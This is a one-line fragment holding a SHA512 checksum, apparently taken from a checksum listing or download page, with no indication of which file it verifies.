  SHA512: 12ebbec1e065c6a0fa92b2b32b8a9b849cb09a473676247b6b2ce3cf3c0bb334901569d783ff237400d178b7e97160f2be8e6bb64693bb49d88289330972a8a2